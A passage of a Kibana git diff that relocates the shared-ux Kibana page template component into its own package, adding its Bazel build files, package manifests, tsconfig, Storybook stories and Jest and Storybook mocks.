TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.mdx b/packages/shared-ux/page/kibana_template/impl/README.mdx similarity index 97% rename from packages/kbn-shared-ux-components/src/page_template/page_template.mdx rename to packages/shared-ux/page/kibana_template/impl/README.mdx index fbaada158e277..6d8151cbe882c 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.mdx +++ b/packages/shared-ux/page/kibana_template/impl/README.mdx @@ -1,6 +1,6 @@ --- id: sharedUX/Components/PageTemplate -slug: /shared-ux-components/page_template/page_template +slug: /shared-ux/page_template title: Page Template description: A Kibana-specific wrapper around `EuiTemplate` tags: ['shared-ux', 'component'] @@ -124,7 +124,7 @@ Increases the consistency in messaging across all the solutions during the getti This is a built-in configuration that displays a very specific UI and requires very specific keys. It will also ignore all other configurations of the template including `pageHeader` and `children`, with the exception of continuing to show `solutionNav`. -The `noDataConfig` is of type [`NoDataPageProps`](https://github.com/elastic/kibana/blob/main/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts#L14): +The `noDataConfig` is of type [`NoDataPageProps`](https://github.com/elastic/kibana/blob/main/packages/shared-ux/page/no_data/types/index.d.ts): 1. `solution: string`: Single name for the current solution, used to auto-generate the title, logo, and description *(required)* 2. `docsLink: string`: Required to set the docs link for the whole solution *(required)* diff --git a/packages/shared-ux/card/no_data/mocks/jest.config.js b/packages/shared-ux/page/kibana_template/impl/jest.config.js similarity index 81% rename from packages/shared-ux/card/no_data/mocks/jest.config.js rename to packages/shared-ux/page/kibana_template/impl/jest.config.js index 2c7697ab74eb8..103defe0f0ca6 100644 --- a/packages/shared-ux/card/no_data/mocks/jest.config.js +++ b/packages/shared-ux/page/kibana_template/impl/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', - roots: ['/packages/shared-ux/card/no_data/mocks'], + roots: ['/packages/shared-ux/page/kibana_template/impl'], }; diff --git a/packages/shared-ux/page/kibana_template/impl/package.json b/packages/shared-ux/page/kibana_template/impl/package.json new file mode 100644 index 0000000000000..a089481047999 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-kibana-template", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template.test.tsx.snap b/packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template.test.tsx.snap similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template.test.tsx.snap rename to packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template.test.tsx.snap diff --git a/packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template_inner.test.tsx.snap b/packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template_inner.test.tsx.snap similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/__snapshots__/page_template_inner.test.tsx.snap rename to packages/shared-ux/page/kibana_template/impl/src/__snapshots__/page_template_inner.test.tsx.snap diff --git a/packages/kbn-shared-ux-components/src/page_template/index.ts b/packages/shared-ux/page/kibana_template/impl/src/index.ts similarity index 60% rename from packages/kbn-shared-ux-components/src/page_template/index.ts rename to packages/shared-ux/page/kibana_template/impl/src/index.ts index cd7d6232d9a8b..9a890cafe49aa 100644 --- a/packages/kbn-shared-ux-components/src/page_template/index.ts +++ b/packages/shared-ux/page/kibana_template/impl/src/index.ts @@ -5,7 +5,12 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ -export { NoDataPage, NoDataConfigPage } from './no_data_page'; + export { KibanaPageTemplate } from './page_template'; -export type { KibanaPageTemplateProps } from './types'; -export type { NoDataPageProps } from './no_data_page'; +export { KibanaPageTemplateProvider, KibanaPageTemplateKibanaProvider } from './services'; +export type { + NoDataConfig, + KibanaPageTemplateProps, + KibanaPageTemplateServices, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template-types'; diff --git a/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx new file mode 100644 index 0000000000000..91f46f4f89faa --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.stories.tsx @@ -0,0 +1,82 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import { + KibanaPageTemplateStorybookMock, + NoDataConfigStorybookMock, + SolutionNavStorybookMock, + InnerPageTemplateStorybookMock, +} from '@kbn/shared-ux-page-kibana-template-mocks'; +import type { + KibanaPageTemplateStorybookParams, + NoDataConfigStorybookParams, + SolutionNavStorybookParams, + InnerPageTemplateStorybookParams, +} from '@kbn/shared-ux-page-kibana-template-mocks'; + +import { KibanaPageTemplateProvider } from './services'; + +import { KibanaPageTemplate as Component } from './page_template'; +import mdx from '../README.mdx'; + +export default { + title: 'Page/Page Template', + description: + 'A thin wrapper around `EuiTemplate`. Takes care of styling, empty state and no data config', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +const templateMock = new KibanaPageTemplateStorybookMock(); +const solutionNavMock = new SolutionNavStorybookMock(); +const noDataConfigMock = new NoDataConfigStorybookMock(); +const innerMock = new InnerPageTemplateStorybookMock(); + +export const WithNoDataConfig = (params: NoDataConfigStorybookParams) => { + return ( + + + + ); +}; + +WithNoDataConfig.argTypes = noDataConfigMock.getArgumentTypes(); + +export const WithSolutionNav = (params: SolutionNavStorybookParams) => { + return ( + + + + ); +}; + +WithSolutionNav.argTypes = solutionNavMock.getArgumentTypes(); + +export const WithBoth = (params: KibanaPageTemplateStorybookParams) => { + return ( + + + + ); +}; + +WithBoth.argTypes = templateMock.getArgumentTypes(); + +export const WithNeither = (params: InnerPageTemplateStorybookParams) => { + return ( + + + + ); +}; + +WithNeither.argTypes = innerMock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx similarity index 97% rename from packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx index 1324b60b92870..0e9df4b6c2394 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.test.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.test.tsx @@ -9,9 +9,9 @@ import React from 'react'; import { shallow, render } from 'enzyme'; import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; import { KibanaPageTemplate } from './page_template'; -import { NoDataPageProps } from './no_data_page'; const items: SolutionNavProps['items'] = [ { diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template.tsx similarity index 82% rename from packages/kbn-shared-ux-components/src/page_template/page_template.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template.tsx index 467f02224b0de..5a05315d395a7 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template.tsx @@ -6,13 +6,17 @@ * Side Public License, v 1. */ -import React, { FunctionComponent } from 'react'; +import React, { FC } from 'react'; + +import { + NoDataConfigPage, + NoDataConfigPageWithSolutionNavBar, +} from '@kbn/shared-ux-page-no-data-config'; +import { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template-types'; -import { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_page'; import { KibanaPageTemplateInner, KibanaPageTemplateWithSolutionNav } from './page_template_inner'; -import { KibanaPageTemplateProps } from './types'; -export const KibanaPageTemplate: FunctionComponent = ({ +export const KibanaPageTemplate: FC = ({ template, className, children, diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.test.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.test.tsx similarity index 100% rename from packages/kbn-shared-ux-components/src/page_template/page_template_inner.test.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template_inner.test.tsx diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx similarity index 81% rename from packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx rename to packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx index 46424348f2ff3..6d836a3c66d7f 100644 --- a/packages/kbn-shared-ux-components/src/page_template/page_template_inner.tsx +++ b/packages/shared-ux/page/kibana_template/impl/src/page_template_inner.tsx @@ -6,20 +6,25 @@ * Side Public License, v 1. */ -import React, { FunctionComponent } from 'react'; - +import React, { FC } from 'react'; +import classNames from 'classnames'; import { EuiEmptyPrompt, EuiPageTemplate } from '@elastic/eui'; -import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; -import { KibanaPageTemplateProps } from './types'; -import { getClasses } from './util'; +import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; +import { KibanaPageTemplateProps as Props } from '@kbn/shared-ux-page-kibana-template-types'; -type Props = KibanaPageTemplateProps; +const getClasses = (template?: string, className?: string) => { + return classNames( + 'kbnPageTemplate', + template ? { [`kbnPageTemplate--${template}`]: template } : '', + className || '' + ); +}; /** * A thin wrapper around EuiPageTemplate with a few Kibana specific additions */ -export const KibanaPageTemplateInner: FunctionComponent = ({ +export const KibanaPageTemplateInner: FC = ({ template, className, pageHeader, diff --git a/packages/shared-ux/page/kibana_template/impl/src/services.tsx b/packages/shared-ux/page/kibana_template/impl/src/services.tsx new file mode 100644 index 0000000000000..328d3e8a6f9c8 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/src/services.tsx @@ -0,0 +1,41 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { + NoDataConfigPageProvider, + NoDataConfigPageKibanaProvider, +} from '@kbn/shared-ux-page-no-data-config'; + +import { + KibanaPageTemplateServices, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const KibanaPageTemplateProvider: FC = ({ + children, + ...services +}) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const KibanaPageTemplateKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return ( + {children} + ); +}; diff --git a/packages/shared-ux/page/kibana_template/impl/tsconfig.json b/packages/shared-ux/page/kibana_template/impl/tsconfig.json new file mode 100644 index 0000000000000..6b965878dca79 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/tsconfig.json @@ -0,0 +1,19 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": ".", + "stripInternal": false, + "types": [ + "jest", + "node", + "@kbn/ambient-ui-types", + ] + }, + "include": [ + "src/**/*" + ] +} diff --git a/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel b/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel new file mode 100644 index 0000000000000..0680dd91e867f --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/BUILD.bazel @@ -0,0 +1,144 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//lodash", + "@npm//react", + "//packages/shared-ux/page/no_data_config/mocks", + "//packages/shared-ux/storybook/mock", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. "//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/jest", + "@npm//@types/lodash", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/page/kibana_template/types", + "//packages/shared-ux/page/no_data_config/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/kibana_template/mocks/README.mdx b/packages/shared-ux/page/kibana_template/mocks/README.mdx new file mode 100644 index 0000000000000..7515ff010ac90 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-kibana-template-mocks + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/kibana_template/mocks/package.json b/packages/shared-ux/page/kibana_template/mocks/package.json new file mode 100644 index 0000000000000..c6dc7b5671d7e --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-kibana-template-mocks", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/packages/shared-ux/page/kibana_template/mocks/src/index.ts b/packages/shared-ux/page/kibana_template/mocks/src/index.ts new file mode 100644 index 0000000000000..c2193c9c89e61 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/index.ts @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +export { + getServicesMock as getKibanaPageTemplateServicesMock, + getKibanaDependenciesMock as getKibanaPageTemplateKibanaDependenciesMock, +} from './jest'; + +export { + KibanaPageTemplateStorybookMock, + NoDataConfigStorybookMock, + SolutionNavStorybookMock, + InnerPageTemplateStorybookMock, +} from './storybook'; + +export type { + KibanaPageTemplateStorybookParams, + NoDataConfigStorybookParams, + SolutionNavStorybookParams, + InnerPageTemplateStorybookParams, +} from './storybook'; diff --git a/packages/shared-ux/page/kibana_template/mocks/src/jest.ts b/packages/shared-ux/page/kibana_template/mocks/src/jest.ts new file mode 100644 index 0000000000000..5f260e194f6d8 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/jest.ts @@ -0,0 +1,30 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { getNoDataCardKibanaDependenciesMock } from '@kbn/shared-ux-card-no-data-mocks'; +import type { + KibanaPageTemplateServices, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template-types'; +import { getNoDataConfigPageServicesMock } from '@kbn/shared-ux-page-no-data-config-mocks'; + +export const getServicesMock = () => { + const services: KibanaPageTemplateServices = { + ...getNoDataConfigPageServicesMock(), + }; + + return services; +}; + +export const getKibanaDependenciesMock = () => { + const dependencies: KibanaPageTemplateKibanaDependencies = { + ...getNoDataCardKibanaDependenciesMock(), + }; + + return dependencies; +}; diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts new file mode 100644 index 0000000000000..6a5754ba1862b --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/all.ts @@ -0,0 +1,72 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +import { noDataConfigArguments } from './no_data_config'; +import type { NoDataConfigArguments } from './no_data_config'; +import { solutionNavArguments, solutionNavProps } from './solution_nav'; +import type { SolutionNavArguments } from './solution_nav'; + +type PropArguments = NoDataConfigArguments & SolutionNavArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...noDataConfigArguments, + ...solutionNavArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }, + solutionNav: { + name: this.getArgumentValue('name', params), + icon: this.getArgumentValue('icon', params), + canBeCollapsed: this.getArgumentValue('canBeCollapsed', params), + ...solutionNavProps, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts new file mode 100644 index 0000000000000..ecbc26c20a095 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/index.ts @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +export { StorybookMock as NoDataConfigStorybookMock } from './no_data_config'; +export type { Params as NoDataConfigStorybookParams } from './no_data_config'; + +export { StorybookMock as SolutionNavStorybookMock } from './solution_nav'; +export type { Params as SolutionNavStorybookParams } from './solution_nav'; + +export { StorybookMock as KibanaPageTemplateStorybookMock } from './all'; +export type { Params as KibanaPageTemplateStorybookParams } from './all'; + +export { StorybookMock as InnerPageTemplateStorybookMock } from './inner'; +export type { Params as InnerPageTemplateStorybookParams } from './inner'; diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx b/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx new file mode 100644 index 0000000000000..7794aea021b89 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/inner.tsx @@ -0,0 +1,94 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +type PageHeader = NonNullable; +export type PageHeaderArguments = Pick< + PageHeader, + 'iconType' | 'pageTitle' | 'description' | 'rightSideItems' +>; + +type PropArguments = Pick & PageHeaderArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const pageHeaderArguments: ArgumentParams = { + isEmptyState: { + control: 'boolean', + defaultValue: false, + }, + iconType: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + pageTitle: { + control: 'text', + defaultValue: 'Page title', + }, + description: { + control: 'text', + defaultValue: 'Page description', + }, + rightSideItems: { + control: 'boolean', + defaultValue: true, + }, +}; + +const rightSideItems: PageHeaderArguments['rightSideItems'] = [ + First Item, + Second Item, +]; + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...pageHeaderArguments, + }; + + serviceArguments = {}; + + dependencies = []; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + isEmptyState: this.getArgumentValue('isEmptyState', params), + pageHeader: { + iconType: this.getArgumentValue('iconType', params), + pageTitle: this.getArgumentValue('pageTitle', params), + description: this.getArgumentValue('description', params), + rightSideItems: this.getArgumentValue('rightSideItems', params) + ? rightSideItems + : undefined, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts new file mode 100644 index 0000000000000..92e7f0da52e62 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/no_data_config.ts @@ -0,0 +1,86 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + NoDataConfig, + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +export type NoDataConfigArguments = Pick< + NoDataConfig, + 'solution' | 'logo' | 'docsLink' | 'pageTitle' +>; + +type PropArguments = NoDataConfigArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const noDataConfigArguments: ArgumentParams = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, +}; + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...noDataConfigArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts new file mode 100644 index 0000000000000..3590a3e896a2e --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts @@ -0,0 +1,115 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +type SolutionNav = NonNullable; +export type SolutionNavArguments = Pick; + +type PropArguments = SolutionNavArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const solutionNavArguments: ArgumentParams = { + name: { + control: 'text', + defaultValue: 'Kibana', + }, + icon: { + control: { type: 'radio' }, + options: ['logoKibana', 'logoObservability', 'logoSecurity'], + defaultValue: 'logoKibana', + }, + canBeCollapsed: { + control: 'boolean', + defaultValue: true, + }, +}; + +export const solutionNavProps = { + items: [ + { + name: 'Ingest', + id: '1', + items: [ + { + name: 'Ingest Node Pipelines', + id: '1.1', + }, + { + name: 'Logstash Pipelines', + id: '1.2', + }, + { + name: 'Beats Central Management', + id: '1.3', + }, + ], + }, + { + name: 'Data', + id: '2', + items: [ + { + name: 'Index Management', + id: '2.1', + }, + { + name: 'Index Lifecycle Policies', + id: '2.2', + }, + { + name: 'Snapshot and Restore', + id: '2.3', + }, + ], + }, + ], +}; + +export class StorybookMock extends AbstractStorybookMock< + KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...solutionNavArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + solutionNav: { + name: this.getArgumentValue('name', params), + icon: this.getArgumentValue('icon', params), + canBeCollapsed: this.getArgumentValue('canBeCollapsed', params), + ...solutionNavProps, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/tsconfig.json b/packages/shared-ux/page/kibana_template/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ 